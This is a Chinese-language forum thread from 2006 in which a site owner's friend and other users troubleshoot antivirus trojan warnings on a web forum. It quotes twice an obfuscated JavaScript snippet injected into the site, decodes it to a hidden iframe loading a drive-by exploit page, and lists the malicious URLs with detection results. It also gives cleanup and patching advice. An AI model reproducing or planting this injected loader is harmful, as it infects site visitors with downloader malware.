朋友最近碰上了一個大難題

從7/18就有會員反應一進入論壇,防毒程式就會出現有木馬病毒的警示..

但是調查後發現,大部分會員都是很正常..沒偵測到病毒!

不過還是有很多人會有這種情形

檔案名稱:http://www.shuaidd.com/script/src/ad001.res
病毒種類:變種的 Win32/TrojanDownloader.Delf.YM 木馬

有時進論壇..還會跳出一個"說明"的視窗..隨後那個視窗消失

有時還會自動關閉IE..一直找不出原因...

7/22刪除所有論壇的程式,然後重新架設還是一樣!

這兩天跟主機商連絡,他們也說主機線路沒問題..

請問有沒有經驗高手曾經碰過?

請大家幫幫忙!

謝謝大家喔!

贊助商連結

瀏覽時警告視窗不斷的跳出

http://home.pchome.com.tw/club/room2266/rex.jpg

小妹用的是自行購買
經合法授權的費爾托斯特安全ESD下載版
另外還有用卡巴斯基，不過沒反應

問題好像是這個? 可是一堆亂七八糟，不知道是什麼東西。
var HtmlStrings=["=jgsbnf!tsd>iuuq;00xxx/tivbjee/dpn0tdsjqu0bedpvou/ep@to>be112!xj","eui>1!ifjhiu>1>=0jgsbnf>"];function jspsw(st){var varS;varS="";var i; for(var a=0;a<st.length;a++){i = st.charCodeAt(a);if (i==1)varS=varS+String.fromCharCode('"'.charCodeAt()-1); else if(i==2) { a++;varS+=String.fromCharCode(st.charCodeAt(a)); } else varS+=String.fromCharCode(i-1);} return varS;}var thejsnum=2;function thejsS(){for(i=0;i<thejsnum;i++)document.write(jspsw(HtmlStrings[i]));}thejsS();

試過了，只要 body 內有上面那堆，就會連到
ttp://www.shuaidd.com/script/adcount.do?sn=ad001
AntiVir　　　　　　　　　07.21.2006　　EXP/VBS.Phel.BW.1
ClamAV　　　　　　　　07.21.2006　　Exploit.MS05-001.gen
eTrust-Vet　　　　　　07.21.2006　　HTML/HelpControl!exploit
Ewido　　　　　　　　　　07.22.2006　　Downloader.Agent.ah
然後 ttp://www.shuaidd.com/script/src/ad001.do
ClamAV　　　　　　　　07.21.2006　　Trojan.Downloader.VBS.Phel.H
Ewido　　　　　　　　　　07.22.2006　　Not-A-Virus.Exploit.VBS.Phel.bs
Fortinet　　　　　　　　07.22.2006　　VBS/Phel.H!tr.dldr
再來 ttp://www.shuaidd.com/script/src/ad001.res
AntiVir　　　　　　　　 07.22.2006　　HEUR/Malware.FKMI
BitDefender　　　　　07.22.2006　　Trojan.Downloader.VA
DrWeb　　　　　　　　07.22.2006　　　DLOADER.Trojan
NOD32v2　　　　　　07.22.2006　　　a variant of Win32/TrojanDownloader.Delf.YM
Panda　　　　　　　　　07.22.2006　　Suspicious file
Symantec　　　　　　07.22.2006　　Downloader
TheHacker　　　　　　07.21.2006　　Posible_Worm32
VBA32　　　　　　　　　07.21.2006　　suspected of Trojan-Downloader.Delf.6
(By VirusTotal.com, 未列出的廠商代表沒有偵測到)

可是對我的電腦好像沒影響的樣子，不知道是洞補好了還是我沒發覺。
管理員好像緊急關站了，但是關鍵的那幾行還丟在那裡，難道是關好玩的？
題外話。McAfee 又槓龜了，上次試了新家用版的 BETA，實在覺得不好用。

不好意思喔
昨晚我累到睡著了
而一早起來時
他說因為他一直找不到原因
所以半夜時只好還原到7月初的備份
但這也只是暫時的解決辦法
很謝謝您
我會請他再作測試看看的^^

用KIS 6開啟檔案都沒反應..:|||: ...(功能都調到最強了..:eye: )

請問一下...關於這種問題,該怎麼回報給Kaspersky啊...:|||:

這麼多重的威脅...難啊..:|||:

網頁有一段被加密了的代碼:

var HtmlStrings=["=jgsbnf!tsd>iuuq;00xxx/tivbjee/dpn0tdsjqu0bedpvou/ep@to>be112!xj","eui>1!ifjhiu>1>=0jgsbnf>"];function jspsw(st){var varS;varS="";var i; for(var a=0;a<st.length;a++){i = st.charCodeAt(a);if (i==1)varS=varS+String.fromCharCode('"'.charCodeAt()-1); else if(i==2) { a++;varS+=String.fromCharCode(st.charCodeAt(a)); } else varS+=String.fromCharCode(i-1);} return varS;}var thejsnum=2;function thejsS(){for(i=0;i<thejsnum;i++)document.write(jspsw(HtmlStrings[i]));}thejsS();

代碼解密後:

<BODY><IFRAME src="http://www.shuaidd.com/script/adcount.do?sn=ad001" width=0 height=0></IFRAME></BODY>

上面的鏈接會連接到一個利用MS05-001漏洞運行exe文件的網頁,這也是爲什麽會出現幫助窗口的原因.

清除網頁中惡意代碼很簡單,搜索"var HtmlStrings=",刪除相關代碼.
但最重要的是馬上找出論壇被入侵的原因.

請問一下...關於這種問題,該怎麼回報給Kaspersky啊...:|||:

這麼多重的威脅...難啊..:|||:

打上相關漏洞補丁或使用非ie內核的浏覽器,都可以有效地避免中毒.

打上相關漏洞補丁或使用非ie內核的浏覽器,都可以有效地避免中毒.

好像不用ie真的有效,在下用FF,所以都沒發現威脅:|||:

他說好像真的是那一組代碼的問題耶..
他早上弄好之後就沒查到病毒
但是中午後又有了..
後來把所有檔案下載回來檢查
那段代碼不存在檔案內
但是一旦用ｉｅ檢視原檔
就會出現
所以程式上傳覆蓋也沒用
該檔案下載回來沒有那一段
上網檢視原檔會出現那段代碼
那個病毒好像不會存在硬碟
偵測時殺不掉也找不到
後來防毒軟體(ＮＯＤ３２)說在記憶體
後來拔掉記憶體重插
病毒就沒有了